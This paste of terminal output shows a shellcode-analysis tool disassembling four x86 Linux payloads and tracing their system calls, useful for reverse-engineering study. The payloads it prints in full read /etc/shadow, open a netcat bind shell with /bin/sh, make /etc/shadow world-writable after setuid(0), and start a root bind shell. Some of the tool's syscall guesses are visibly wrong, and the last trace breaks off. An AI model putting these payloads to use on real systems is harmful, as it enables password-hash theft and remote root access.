Don't like ads? PRO users don't see any ads ;-)
Public Pastes
Guest

disasm/reverse shellcode

By: a guest on May 12th, 2012  |  syntax: None  |  size: 10.89 KB  |  hits: 37  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. entropy@phiral.net:~/reverse_shellcode$ ./revsc.py -s "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x61\x64\x6f\x77\x68\x2f\x2f\x73\x68\x68\x2f\x65\x74\x63\x89\xe1\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
  2.  
  3. [*] Bits: 32
  4.  
  5. [*] Shellcode:
  6. \x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3
  7. \x50\x68\x61\x64\x6f\x77\x68\x2f\x2f\x73\x68\x68\x2f\x65\x74
  8. \x63\x89\xe1\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80
  9.  
  10. [*] Assembly:
  11.     xor    %eax,%eax
  12.     push   %eax
  13.     push   $0x7461632f
  14.     push   $0x6e69622f
  15.     mov    %esp,%ebx
  16.     push   %eax
  17.     push   $0x776f6461
  18.     push   $0x68732f2f
  19.     push   $0x6374652f
  20.     mov    %esp,%ecx
  21.     push   %eax
  22.     push   %ecx
  23.     push   %ebx
  24.     mov    %esp,%ecx
  25.     mov    $0xb,%al
  26.     int    $0x80
  27.  
  28. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  29.  
  30. [*] Assembly Block [0xb __NR_execve]:
  31.     xor    %eax,%eax
  32.     push   %eax
  33.     push   $0x7461632f
  34.     push   $0x6e69622f
  35.     mov    %esp,%ebx
  36.     push   %eax
  37.     push   $0x776f6461
  38.     push   $0x68732f2f
  39.     push   $0x6374652f
  40.     mov    %esp,%ecx
  41.     push   %eax
  42.     push   %ecx
  43.     push   %ebx
  44.     mov    %esp,%ecx
  45.     mov    $0xb,%al
  46.     int    $0x80
  47.  
  48. [*] Following all register values:
  49.     1 -> %eax = 0
  50.     2 -> %esp = %eax
  51.     3 -> %esp = $0x7461632f (/cat)
  52.     4 -> %esp = $0x6e69622f (/bin)
  53.     5 -> %ebx = /bin/cat
  54.     6 -> %esp = %eax
  55.     7 -> %esp = $0x776f6461 (adow)
  56.     8 -> %esp = $0x68732f2f (//sh)
  57.     9 -> %esp = $0x6374652f (/etc)
  58.     10 -> %ecx = /bin/cat /etc//shadow
  59.     11 -> %esp = %eax
  60.     12 -> %esp = %ecx
  61.     13 -> %esp = %ebx
  62.     14 -> %ecx = /bin/cat /etc//shadow  
  63.     15 -> %al = $0xb [decimal: 11 octal: 13]
  64.  
  65. [*] Register values at syscall:
  66.     stack printable: /bin/cat /etc//shadow  
  67.     %ebx is /bin/cat
  68.     %eax is 0xb
  69.     %esp is %ebx
  70.     %ecx is /bin/cat /etc//shadow  
  71.  
  72. [*] System Call Guess: execve("/bin/cat", "/bin/cat /etc//shadow")
  73.  
  74. [*] System Call Executed (approx): execve("/bin/cat", ["/bin/cat", "/etc//shadow"], [/* 0 vars */])
  75.  
  76. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  77.  
  78.  
  79.  
  80. entropy@phiral.net:~/reverse_shellcode$ ./revsc.py -s "\x31\xc0\x50\x68\x74\x63\x61\x74\x68\x6e\x2f\x6e\x65\x68\x72\x2f\x62\x69\x68\x2f\x2f\x75\x73\x89\xe3\x50\x68\x36\x36\x36\x36\x68\x2d\x6c\x74\x70\x89\xe2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x66\x68\x2d\x65\x89\xe1\x50\x51\x52\x53\x89\xe6\xb0\x0b\x89\xf1\x31\xd2\xcd\x80"
  81.  
  82. [*] Bits: 32
  83.  
  84. [*] Shellcode:
  85. \x31\xc0\x50\x68\x74\x63\x61\x74\x68\x6e\x2f\x6e\x65\x68\x72
  86. \x2f\x62\x69\x68\x2f\x2f\x75\x73\x89\xe3\x50\x68\x36\x36\x36
  87. \x36\x68\x2d\x6c\x74\x70\x89\xe2\x50\x68\x6e\x2f\x73\x68\x68
  88. \x2f\x2f\x62\x69\x66\x68\x2d\x65\x89\xe1\x50\x51\x52\x53\x89
  89. \xe6\xb0\x0b\x89\xf1\x31\xd2\xcd\x80
  90.  
  91. [*] Assembly:
  92.     xor    %eax,%eax
  93.     push   %eax
  94.     push   $0x74616374
  95.     push   $0x656e2f6e
  96.     push   $0x69622f72
  97.     push   $0x73752f2f
  98.     mov    %esp,%ebx
  99.     push   %eax
  100.     push   $0x36363636
  101.     push   $0x70746c2d
  102.     mov    %esp,%edx
  103.     push   %eax
  104.     push   $0x68732f6e
  105.     push   $0x69622f2f
  106.     pushw  $0x652d
  107.     mov    %esp,%ecx
  108.     push   %eax
  109.     push   %ecx
  110.     push   %edx
  111.     push   %ebx
  112.     mov    %esp,%esi
  113.     mov    $0xb,%al
  114.     mov    %esi,%ecx
  115.     xor    %edx,%edx
  116.     int    $0x80
  117.  
  118. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  119.  
  120. [*] Assembly Block [0xb __NR_execve]:
  121.     xor    %eax,%eax
  122.     push   %eax
  123.     push   $0x74616374
  124.     push   $0x656e2f6e
  125.     push   $0x69622f72
  126.     push   $0x73752f2f
  127.     mov    %esp,%ebx
  128.     push   %eax
  129.     push   $0x36363636
  130.     push   $0x70746c2d
  131.     mov    %esp,%edx
  132.     push   %eax
  133.     push   $0x68732f6e
  134.     push   $0x69622f2f
  135.     pushw  $0x652d
  136.     mov    %esp,%ecx
  137.     push   %eax
  138.     push   %ecx
  139.     push   %edx
  140.     push   %ebx
  141.     mov    %esp,%esi
  142.     mov    $0xb,%al
  143.     mov    %esi,%ecx
  144.     xor    %edx,%edx
  145.     int    $0x80
  146.  
  147. [*] Following all register values:
  148.     1 -> %eax = 0
  149.     2 -> %esp = %eax
  150.     3 -> %esp = $0x74616374 (tcat)
  151.     4 -> %esp = $0x656e2f6e (n/ne)
  152.     5 -> %esp = $0x69622f72 (r/bi)
  153.     6 -> %esp = $0x73752f2f (//us)
  154.     7 -> %ebx = //usr/bin/netcat
  155.     8 -> %esp = %eax
  156.     9 -> %esp = $0x36363636 (6666)
  157.     10 -> %esp = $0x70746c2d (-ltp)
  158.     11 -> %edx = //usr/bin/netcat -ltp6666
  159.     12 -> %esp = %eax
  160.     13 -> %esp = $0x68732f6e (n/sh)
  161.     14 -> %esp = $0x69622f2f (//bi)
  162.     15 -> %esp = $0x652d (-e)
  163.     16 -> %ecx = //usr/bin/netcat -ltp6666 -e//bin/sh
  164.     17 -> %esp = %eax
  165.     18 -> %esp = %ecx
  166.     19 -> %esp = %edx
  167.     20 -> %esp = %ebx
  168.     21 -> %esi = //usr/bin/netcat -ltp6666 -e//bin/sh  
  169.     22 -> %al = $0xb [decimal: 11 octal: 13]
  170.     23 -> %ecx = %esi
  171.     24 -> %edx = 0
  172.  
  173. [*] Register values at syscall:
  174.     stack printable: //usr/bin/netcat -ltp6666 -e//bin/sh  
  175.     %eax is 0xb
  176.     %ebx is //usr/bin/netcat
  177.     %esi is //usr/bin/netcat -ltp6666 -e//bin/sh  
  178.     %ecx is %esi
  179.     %edx is 0
  180.     %esp is %ebx
  181.  
  182. [*] System Call Guess: execve("//usr/bin/netcat", "//usr/bin/netcat -ltp6666 -e//bin/sh", 0)
  183.  
  184. [*] System Call Executed (approx): execve("//usr/bin/netcat", ["//usr/bin/netcat", "-ltp6666", "-e//bin/sh"], [/* 0 vars */])
  185.  
  186. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  187.  
  188.  
  189. entropy@phiral.net:~/reverse_shellcode$ ./revsc.py -s "\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x61\x64\x6f\x77\x68\x63\x2f\x73\x68\x68\x2f\x2f\x65\x74\x89\xe3\x66\xb9\xb6\x01\xb0\x0f\xcd\x80\x40\xcd\x80"
  190.  
  191. [*] Bits: 32
  192.  
  193. [*] Shellcode:
  194. \x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x61\x64\x6f\x77\x68
  195. \x63\x2f\x73\x68\x68\x2f\x2f\x65\x74\x89\xe3\x66\xb9\xb6\x01
  196. \xb0\x0f\xcd\x80\x40\xcd\x80
  197.  
  198. [*] Assembly:
  199.     xor    %ebx,%ebx
  200.     mov    $0x17,%al
  201.     int    $0x80
  202.     xor    %eax,%eax
  203.     push   %eax
  204.     push   $0x776f6461
  205.     push   $0x68732f63
  206.     push   $0x74652f2f
  207.     mov    %esp,%ebx
  208.     mov    $0x1b6,%cx
  209.     mov    $0xf,%al
  210.     int    $0x80
  211.     inc    %eax
  212.     int    $0x80
  213.  
  214. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  215.  
  216. [*] Assembly Block [0x17 __NR_setuid]:
  217.     xor    %ebx,%ebx
  218.     mov    $0x17,%al
  219.     int    $0x80
  220.  
  221. [*] Following all register values:
  222.     1 -> %ebx = 0
  223.     2 -> %al = $0x17 [decimal: 23 octal: 27]
  224.  
  225. [*] Register values at syscall:
  226.     %ebx is 0
  227.     %al is 0x17
  228.  
  229. [*] System Call Guess: setuid(0)
  230.  
  231. [*] System Call Executed (approx): setuid(0)
  232.  
  233. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  234. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  235.  
  236. [*] Assembly Block [0xf __NR_chmod]:
  237.     xor    %eax,%eax
  238.     push   %eax
  239.     push   $0x776f6461
  240.     push   $0x68732f63
  241.     push   $0x74652f2f
  242.     mov    %esp,%ebx
  243.     mov    $0x1b6,%cx
  244.     mov    $0xf,%al
  245.     int    $0x80
  246.  
  247. [*] Following all register values:
  248.     1 -> %eax = 0
  249.     2 -> %esp = %eax
  250.     3 -> %esp = $0x776f6461 (adow)
  251.     4 -> %esp = $0x68732f63 (c/sh)
  252.     5 -> %esp = $0x74652f2f (//et)
  253.     6 -> %ebx = //etc/shadow
  254.     7 -> %cx = $0x1b6 [decimal: 438 octal: 666]
  255.     8 -> %al = $0xf [decimal: 15 octal: 17]
  256.  
  257. [*] Register values at syscall:
  258.     stack printable: //etc/shadow
  259.     %ebx is //etc/shadow
  260.     %eax is 0xf
  261.     %esp is 0x74652f2f
  262.     %cx is 0x1b6
  263.  
  264. [*] System Call Guess: chmod("//etc/shadow")
  265.  
  266. [*] System Call Executed (approx): chmod("//etc/shadow", 0666)
  267.  
  268. [ASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCKASMBLOCK]
  269.  
  270.  
  271. entropy@phiral.net:~$ ./revsc.old.py -s "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
  272.  
  273. [*] Bits: 32
  274.  
  275. [*] Shellcode:
  276. \x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53
  277. \x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a
  278. \x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66
  279. \xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0
  280. \x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8
  281. \x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80
  282.  
  283. [*] Assembly:
  284.     xor    %eax,%eax
  285.     xor    %ebx,%ebx
  286.     mov    $0x17,%al
  287.     int    $0x80
  288.     xor    %ebx,%ebx
  289.     mul    %ebx
  290.     mov    $0x66,%al
  291.     push   %ebx
  292.     inc    %ebx
  293.     push   %ebx
  294.     inc    %ebx
  295.     push   %ebx
  296.     mov    %esp,%ecx
  297.     dec    %ebx
  298.     int    $0x80
  299.     mov    %eax,%edi
  300.     push   %edx
  301.     pushw  $0x697a
  302.     inc    %ebx
  303.     push   %bx
  304.     mov    %esp,%ecx
  305.     mov    $0x10,%al
  306.     push   %eax
  307.     push   %ecx
  308.     push   %edi
  309.     mov    %esp,%ecx
  310.     mov    $0x66,%al
  311.     int    $0x80
  312.     mov    $0x66,%al
  313.     mov    $0x4,%bl
  314.     int    $0x80
  315.     push   %eax
  316.     push   %eax
  317.     push   %edi
  318.     mov    %esp,%ecx
  319.     inc    %ebx
  320.     mov    $0x66,%al
  321.     int    $0x80
  322.     mov    %ebx,%ecx
  323.     mov    %eax,%ebx
  324.     mov    $0x3f,%al
  325.     dec    %ecx
  326.     int    $0x80
  327.     inc    %ecx
  328.     loop   0x43
  329.     push   %ecx
  330.     push   $0x68732f6e
  331.     push   $0x69622f2f
  332.     mov    %esp,%ebx
  333.     push   %ecx
  334.     push   %ebx
  335.     mov    %esp,%ecx
  336.     mov    $0xb,%al
  337.     int    $0x80
  338.  
  339. [*] Assembly Block [0x17 __NR_setuid]:
  340.     xor    %eax,%eax
  341.     xor    %ebx,%ebx
  342.     mov    $0x17,%al
  343.     int    $0x80
  344. [*] System Call (approximate): setuid(0)
  345.  
  346. [*] Assembly Block [0x66 __NR_socketcall]:
  347.     xor    %ebx,%ebx
  348.     mul    %ebx
  349.     mov    $0x66,%al
  350.     push   %ebx
  351.     inc    %ebx
  352.     push   %ebx
  353.     inc    %ebx
  354.     push   %ebx
  355.     mov    %esp,%ecx
  356.     dec    %ebx
  357.     int    $0x80
  358. [*] System Call (approximate): socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
  359.  
  360. [*] Assembly Block [0x66 __NR_socketcall]:
  361.     mov    %eax,%edi
  362.     push   %edx
  363.     pushw  $0x697a
  364.     inc    %ebx
  365.     push   %bx
  366.     mov    %esp,%ecx
  367.     mov    $0x10,%al
  368.     push   %eax
  369.     push   %ecx
  370.     push   %edi
  371.     mov    %esp,%ecx
  372.     mov    $0x66,%al
  373.     int    $0x80
  374. [*] System Call (approximate): socket(PF_UNSPEC, SOCK_CLOEXEC|0xffa0b778, 16)
  375.  
  376. [*] Assembly Block [0x66 __NR_socketcall]:
  377.     mov    $0x66,%al
  378.     mov    $0x4,%bl
  379.     int    $0x80
  380. [*] System Call (approximate): listen(0, 0)
  381.  
  382. [*] Assembly Block [0x66 __NR_socketcall]:
  383.     push   %eax
  384.     push   %eax
  385.     push   %edi
  386.     mov    %esp,%ecx
  387.     inc    %ebx
  388.     mov    $0x66,%al
  389.     int    $0x80
  390. [*] System Call (approximate): socket(PF_UNSPEC, 0, 0)
  391.  
  392. [*] Assembly Block [0x3f __NR_dup2]:
  393.     mov    %ebx,%ecx
  394.     mov    %eax,%ebx
  395.     mov    $0x3f,%al
  396.     dec    %ecx
  397.     int    $0x80
  398. [*] System Call (approximate): dup2(0, 4294967295)
  399.  
  400. [*] Assembly Block [0xb __NR_execve]:
  401.     inc    %ecx
  402.     loop   0x43
  403.     push   %ecx
  404.     push   $0x68732f6e
  405.     push   $0x69622f2f
  406.     mov    %esp,%ebx
  407.     push   %ecx
  408.     push   %ebx
  409.     mov    %esp,%ecx
  410.     mov    $0xb,%al
  411.     int    $0x80
  412.  
  413. ...
create a new version of this paste RAW Paste Data